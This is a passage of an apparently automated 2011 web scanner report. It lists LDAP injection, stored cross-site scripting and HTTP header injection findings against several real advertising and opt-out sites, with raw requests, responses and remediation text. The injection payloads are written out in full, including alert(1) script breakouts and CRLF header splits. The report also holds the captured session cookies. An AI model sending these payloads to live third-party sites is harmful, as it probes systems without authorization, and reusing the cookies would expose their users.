Path:   /RealMedia/ads/adstream.cap/123

Issue detail

The c parameter appears to be vulnerable to LDAP injection attacks.

The payloads 1aa9d7b3bcb1543a)(sn=* and 1aa9d7b3bcb1543a)!(sn=* were each submitted in the c parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /RealMedia/ads/adstream.cap/123?c=1aa9d7b3bcb1543a)(sn=*&va=1&e=30d HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022jF2

Response 1

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:12 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 1aa9d7b3bcb1543a)(sn=*=1; expires=Tue, 04-Oct-11 04:00:12 GMT; path=/; domain=.247realmedia.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain

Request 2

GET /RealMedia/ads/adstream.cap/123?c=1aa9d7b3bcb1543a)!(sn=*&va=1&e=30d HTTP/1.1
Host: oasc12.247realmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: OAX=Mhd7ak5JOcoADoVu; NSC_d12efm_qppm_iuuq=ffffffff09419e4445525d5f4f58455e445a4a423660; RMFD=011R02ZNO1022jF2

Response 2

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:00:13 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 1aa9d7b3bcb1543a)!(sn=*=1; expires=Tue, 04-Oct-11 04:00:13 GMT; path=/; domain=.247realmedia.com
Location: /RealMedia/ads/Creatives/default/empty.gif
Connection: close
Content-Length: 0
Content-Type: text/plain


3.6. http://pixel.quantserve.com/optout_set [nocache parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://pixel.quantserve.com
Path:   /optout_set

Issue detail

The nocache parameter appears to be vulnerable to LDAP injection attacks.

The payloads c775130afbcbeffd)(sn=* and c775130afbcbeffd)!(sn=* were each submitted in the nocache parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /optout_set?s=nai&nocache=c775130afbcbeffd)(sn=* HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response 1

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Wed, 01-Sep-2021 11:15:15 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=c775130afbcbeffd)(sn=
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 04 Sep 2011 11:15:15 GMT
Server: QS

Request 2

GET /optout_set?s=nai&nocache=c775130afbcbeffd)!(sn=* HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4e5e6725-891ad-f8693-5137e; d=EG8BIgHQB4FQCa0Wu-EYIIvxC6pQ

Response 2

HTTP/1.1 302 Found
Connection: close
Set-Cookie: qoo=OPT_OUT; expires=Wed, 01-Sep-2021 11:15:15 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Location: /optout_verify?s=nai&nocache=c775130afbcbeffd)!(sn=
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sun, 04 Sep 2011 11:15:15 GMT
Server: QS


3.7. http://www.networkadvertising.org/managing/optout_results.asp [optThis parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.networkadvertising.org
Path:   /managing/optout_results.asp

Issue detail

The optThis parameter appears to be vulnerable to LDAP injection attacks.

The payloads a0295734fc242a2c)(sn=* and a0295734fc242a2c)!(sn=* were each submitted in the optThis parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...
s=24&optThis=25&optThis=26&optThis=27&optThis=28&optThis=29&optThis=30&optThis=31&optThis=32&optThis=33&optThis=34&optThis=35&optThis=36&optThis=37&optThis=38&optThis=39&optThis=40&optThis=41&optThis=a0295734fc242a2c)(sn=*&optThis=43&optThis=44&optThis=45&optThis=46&optThis=47&optThis=48&optThis=49&optThis=50&optThis=51&optThis=52&optThis=53&optThis=54&optThis=55&optThis=56&optThis=57&optThis=58&optThis=59&optThis=60&o
...[SNIP]...

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:28:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:28:32 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.2977564 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=0.2148968 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.994634 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.3898432 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=0.2042155 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a
...[SNIP]...

Request 2

POST /managing/optout_results.asp HTTP/1.1
Host: www.networkadvertising.org
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
Content-Length: 873
Cache-Control: max-age=0
Origin: http://www.networkadvertising.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASBDATQ=FCNKKPJCMDIJJDNIDDFMIMFA; __utma=1.1392774634.1315133979.1315133979.1315133979.1; __utmb=1; __utmc=1; __utmz=1.1315133979.1.1.utmccn=(referral)|utmcsr=tidaltv.com|utmcct=/PrivacyDashboard.aspx|utmcmd=referral

optThis=1&optThis=2&optThis=3&optThis=4&optThis=5&optThis=6&optThis=7&optThis=8&optThis=9&optThis=10&optThis=11&optThis=12&optThis=13&optThis=14&optThis=15&optThis=16&optThis=17&optThis=18&optThis=19&
...[SNIP]...
s=24&optThis=25&optThis=26&optThis=27&optThis=28&optThis=29&optThis=30&optThis=31&optThis=32&optThis=33&optThis=34&optThis=35&optThis=36&optThis=37&optThis=38&optThis=39&optThis=40&optThis=41&optThis=a0295734fc242a2c)!(sn=*&optThis=43&optThis=44&optThis=45&optThis=46&optThis=47&optThis=48&optThis=49&optThis=50&optThis=51&optThis=52&optThis=53&optThis=54&optThis=55&optThis=56&optThis=57&optThis=58&optThis=59&optThis=60&o
...[SNIP]...

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 11:28:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
cache-control: private
pragma: no-cache
Content-Type: text/html
Expires: Sat, 03 Sep 2011 11:28:32 GMT
Cache-control: no-cache


<html>
   <head>
       <title> Welcome to Network Advertising Initiative </title>


       <link rel = stylesheet href = "../library/nai_masterstyle.css" Type = "text/css">
   
<script src="http://ww
...[SNIP]...
<img src=http://optout.imiclk.com/cgi/optout.cgi?nai=1&nocache=0.1614038 width=15 height=15></td> <td valign=top> <font face='verdana'><b>aCerno</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://www.adbrite.com/mb/nai_optout.php?nocache=7.854426E-02 width=15 height=15></td> <td valign=top> <font face='verdana'><b>AdBrite</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://events.adchemy.com/visitor/auuid/nai-opt-out?nocache=0.8582814 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adchemy</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://ads.amgdgt.com/ads/opt-out?op=set&src=NAI&j=&nocache=0.2534907 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adconion</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clicking <a target=_top href=opt_out.asp>here</a> or you may contact the NAI regarding the issue by <a href=../contact/>clicking here</a>.</font><br>&nbsp;</td></tr><tr> <td valign=top><img src=http://optout.yieldoptimizer.com/optout/nopt?nocache=6.786293E-02 width=15 height=15></td> <td valign=top> <font face='verdana'><b>Adara Media</b> <br>If you do not see the green check mark, you may not have been opted out successfully. You may try again by clic
...[SNIP]...

4. Cross-site scripting (stored)  previous  next
There are 2 instances of this issue:

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


4.1. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-504/d8/jsc/fm.js is copied into a JavaScript string which is encapsulated in single quotation marks at the URL /bar/v16-504/d8/jsc/fm.js. The payload 5da07'-alert(1)-'6ad983039ac was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-504/d8/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=5da07'-alert(1)-'6ad983039ac&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Request 2

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:5da07'-alert(1)-'6ad983039ac,baeb2%27%3bb36ac29226,baeb2';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=29:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=171
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:31:47 GMT
Content-Length: 4639
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='5da07'-alert(1)-'6ad983039ac,baeb2%27%3bb36ac29226,baeb2'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=5da07'-alert(1)-'6ad983039ac,baeb2%27%3bb36ac29226,baeb2';z="+Math.random();}

if(zzuid=='unkn
...[SNIP]...

4.2. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the $ request parameter submitted to the URL /bar/v16-504/d8/jsc/fm.js is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /bar/v16-504/d8/jsc/fm.js. The payload 3bfed"-alert(1)-"cbdca187d51 was submitted in the $ parameter. This input was returned unmodified in a subsequent request for the URL /bar/v16-504/d8/jsc/fm.js.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request 1

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=3bfed"-alert(1)-"cbdca187d51&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Request 2

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response 2

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:3bfed"-alert(1)-"cbdca187d51,4ddaa%22%3be568606754f,4ddaa";expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=21:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=172
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:31:46 GMT
Content-Length: 4661
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='3bfed"-alert(1)-"cbdca187d51,4ddaa%22%3be568606754f,4ddaa"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=3bfed"-alert(1)-"cbdca187d51,4ddaa%22%3be568606754f,4ddaa";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


                                                                   
...[SNIP]...

5. HTTP header injection  previous  next
There are 21 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


5.1. http://ads.masslive.com/RealMedia/ads/adstream.cap [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.masslive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload 64faf%0d%0ac9ed964d708 was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=64faf%0d%0ac9ed964d708&va=1&e=30d HTTP/1.1
Host: ads.masslive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:01:56 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: 64faf
c9ed964d708
=1; expires=Tue, 04-Oct-11 04:01:56 GMT; path=/; domain=.masslive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
nnCoection: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:11:56 GMT;path=/;httponly


5.2. http://ads.masslive.com/RealMedia/ads/adstream.cap [va parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.masslive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the va request parameter is copied into the Set-Cookie response header. The payload c8998%0d%0a6cd6f44de8f was submitted in the va parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=crtg&va=c8998%0d%0a6cd6f44de8f&e=30d HTTP/1.1
Host: ads.masslive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:57 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: crtg=c8998
6cd6f44de8f
; expires=Tue, 04-Oct-11 04:02:57 GMT; path=/; domain=.masslive.com
Content-Type: text/plain; charset=UTF-8
Location: /RealMedia/ads/Creatives/default/empty.gif
Cneonction: close
Content-Length: 0
Set-Cookie: NSC_mc-pbt-qspe-ef=ffffffff0929170045525d5f4f58455e445a4a423660;expires=Sun, 04-Sep-2011 04:12:57 GMT;path=/;httponly


5.3. http://ads.mlive.com/RealMedia/ads/adstream.cap [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.mlive.com
Path:   /RealMedia/ads/adstream.cap

Issue detail

The value of the c request parameter is copied into the Set-Cookie response header. The payload a5e27%0d%0a56b30a2b4ac was submitted in the c parameter. This caused a response containing an injected HTTP header.

Request

GET /RealMedia/ads/adstream.cap?c=a5e27%0d%0a56b30a2b4ac&va=1&e=30d HTTP/1.1
Host: ads.mlive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://dis.sv.us.criteo.com/dis/dis.aspx?pu=1174&cb=eefb80330c
Cookie: crtg=1

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 04:02:07 GMT
Server: Apache/2.0.52 (CentOS)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Set-Cookie: a5e27
56b30a2b4ac
=1; expires=Tue, 04-Oct-11 04:02:07 GMT; path=/; domain=.mlive.com
